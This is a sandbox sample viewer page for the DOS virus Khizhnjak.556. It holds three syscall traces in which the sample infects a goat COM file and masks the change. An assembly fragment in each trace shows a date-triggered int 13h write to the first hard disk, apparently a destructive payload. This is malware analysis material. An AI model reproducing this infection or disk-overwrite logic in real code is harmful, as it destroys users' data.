Sample viewer

vx.netlux.org/Virus.DOS.Khizhnjak.556

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:42:32.35054159Z	78	PC: 12bc8 \| Find first file
2018-12-17T22:42:32.357755128Z	67	PC: 12c11 \| Get or set file attributes
2018-12-17T22:42:32.363231259Z	67	PC: 12c25 \| Get or set file attributes
2018-12-17T22:42:32.385667722Z	61	PC: 12c32 \| Open file (Filename = 'séá')
2018-12-17T22:42:32.401250331Z	63	PC: 12c48 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:42:32.407499507Z	87	PC: 12c56 \| Get or set file date and time
2018-12-17T22:42:32.408799035Z	66	PC: 12c74 \| Move file pointer
2018-12-17T22:42:32.410272417Z	66	PC: 12cad \| Move file pointer
2018-12-17T22:42:32.4116772Z	63	PC: 12cc0 \| Read file or device (Read 1 bytes on handle 5)
2018-12-17T22:42:32.413912773Z	66	PC: 12cec \| Move file pointer
2018-12-17T22:42:32.415152078Z	64	PC: 12cfd \| Write file or device (Write 556 bytes on handle 5)
2018-12-17T22:42:32.423515059Z	66	PC: 12d0f \| Move file pointer
2018-12-17T22:42:32.425017693Z	64	PC: 12d1f \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:42:32.431556538Z	42	PC: 12d2b \| Get date 0x12d2b: cmp dl, 0xa 0x12d2e: je 0x12d33 0x12d30: jmp 0x12d44 0x12d32: nop 0x12d33: mov ah, 3 0x12d35: mov al, 0x64 0x12d37: mov ch, 0 0x12d39: mov cl, 0 0x12d3b: mov dh, 0 0x12d3d: mov dl, 0x80 0x12d3f: mov bx, 0x33c 0x12d42: int 0x13 0x12d44: cmp word ptr [0x334], -1 0x12d49: je 0x12d70 0x12d4b: mov ax, 0x5701 0x12d4e: mov bx, word ptr [0x334] 0x12d52: mov cx, word ptr [0x330] 0x12d56: mov dx, word ptr [0x332] 0x12d5a: int 0x21 0x12d5c: mov bx, word ptr [0x334]
2018-12-17T22:42:32.434790268Z	87	PC: 12d5c \| Get or set file date and time
2018-12-17T22:42:32.436453321Z	62	PC: 12d64 \| Close file
2018-12-17T22:42:32.444281573Z	67	PC: 12d70 \| Get or set file attributes
2018-12-17T22:42:32.45531058Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T22:42:32.46054001Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7591,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:01:54.886017238Z	78	PC: 12bc8 \| Find first file
2018-12-25T12:01:54.892818623Z	67	PC: 12c11 \| Get or set file attributes
2018-12-25T12:01:54.898986987Z	67	PC: 12c25 \| Get or set file attributes
2018-12-25T12:01:54.917364785Z	61	PC: 12c32 \| Open file (Filename = 'séá')
2018-12-25T12:01:54.937631135Z	63	PC: 12c48 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:01:54.94480672Z	87	PC: 12c56 \| Get or set file date and time
2018-12-25T12:01:54.946498564Z	66	PC: 12c74 \| Move file pointer
2018-12-25T12:01:54.947871863Z	66	PC: 12cad \| Move file pointer
2018-12-25T12:01:54.950067267Z	63	PC: 12cc0 \| Read file or device (Read 1 bytes on handle 5)
2018-12-25T12:01:54.952774023Z	66	PC: 12cec \| Move file pointer
2018-12-25T12:01:54.954601982Z	64	PC: 12cfd \| Write file or device (Write 556 bytes on handle 5)
2018-12-25T12:01:54.982805387Z	66	PC: 12d0f \| Move file pointer
2018-12-25T12:01:54.985133994Z	64	PC: 12d1f \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:01:54.995399036Z	42	PC: 12d2b \| Get date 0x12d2b: cmp dl, 0xa 0x12d2e: je 0x12d33 0x12d30: jmp 0x12d44 0x12d32: nop 0x12d33: mov ah, 3 0x12d35: mov al, 0x64 0x12d37: mov ch, 0 0x12d39: mov cl, 0 0x12d3b: mov dh, 0 0x12d3d: mov dl, 0x80 0x12d3f: mov bx, 0x33c 0x12d42: int 0x13 0x12d44: cmp word ptr [0x334], -1 0x12d49: je 0x12d70 0x12d4b: mov ax, 0x5701 0x12d4e: mov bx, word ptr [0x334] 0x12d52: mov cx, word ptr [0x330] 0x12d56: mov dx, word ptr [0x332] 0x12d5a: int 0x21 0x12d5c: mov bx, word ptr [0x334]
2018-12-25T12:01:54.998400437Z	87	PC: 12d5c \| Get or set file date and time
2018-12-25T12:01:55.000043028Z	62	PC: 12d64 \| Close file
2018-12-25T12:01:55.007911541Z	67	PC: 12d70 \| Get or set file attributes
2018-12-25T12:01:55.023768567Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:55.029279476Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')

{"DateBased":true,"Day":10,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":7591,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:01:54.950251518Z	78	PC: 12bc8 \| Find first file
2018-12-25T12:01:54.954090235Z	67	PC: 12c11 \| Get or set file attributes
2018-12-25T12:01:54.957864271Z	67	PC: 12c25 \| Get or set file attributes
2018-12-25T12:01:54.971796764Z	61	PC: 12c32 \| Open file (Filename = 'séá')
2018-12-25T12:01:54.984135202Z	63	PC: 12c48 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:01:54.989878638Z	87	PC: 12c56 \| Get or set file date and time
2018-12-25T12:01:54.99211909Z	66	PC: 12c74 \| Move file pointer
2018-12-25T12:01:54.994698269Z	66	PC: 12cad \| Move file pointer
2018-12-25T12:01:54.995707131Z	63	PC: 12cc0 \| Read file or device (Read 1 bytes on handle 5)
2018-12-25T12:01:54.998790065Z	66	PC: 12cec \| Move file pointer
2018-12-25T12:01:55.010641909Z	64	PC: 12cfd \| Write file or device (Write 556 bytes on handle 5)
2018-12-25T12:01:55.025353985Z	66	PC: 12d0f \| Move file pointer
2018-12-25T12:01:55.034484387Z	64	PC: 12d1f \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:01:55.04060956Z	42	PC: 12d2b \| Get date 0x12d2b: cmp dl, 0xa 0x12d2e: je 0x12d33 0x12d30: jmp 0x12d44 0x12d32: nop 0x12d33: mov ah, 3 0x12d35: mov al, 0x64 0x12d37: mov ch, 0 0x12d39: mov cl, 0 0x12d3b: mov dh, 0 0x12d3d: mov dl, 0x80 0x12d3f: mov bx, 0x33c 0x12d42: int 0x13 0x12d44: cmp word ptr [0x334], -1 0x12d49: je 0x12d70 0x12d4b: mov ax, 0x5701 0x12d4e: mov bx, word ptr [0x334] 0x12d52: mov cx, word ptr [0x330] 0x12d56: mov dx, word ptr [0x332] 0x12d5a: int 0x21 0x12d5c: mov bx, word ptr [0x334]
2018-12-25T12:01:55.043489851Z	87	PC: 12d5c \| Get or set file date and time
2018-12-25T12:01:55.045924598Z	62	PC: 12d64 \| Close file
2018-12-25T12:01:55.05393731Z	67	PC: 12d70 \| Get or set file attributes
2018-12-25T12:01:55.063786414Z	9	PC: 12a82 \| Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:01:55.069851684Z	76	PC: 12a86 \| Terminate with return code (Return code = '36')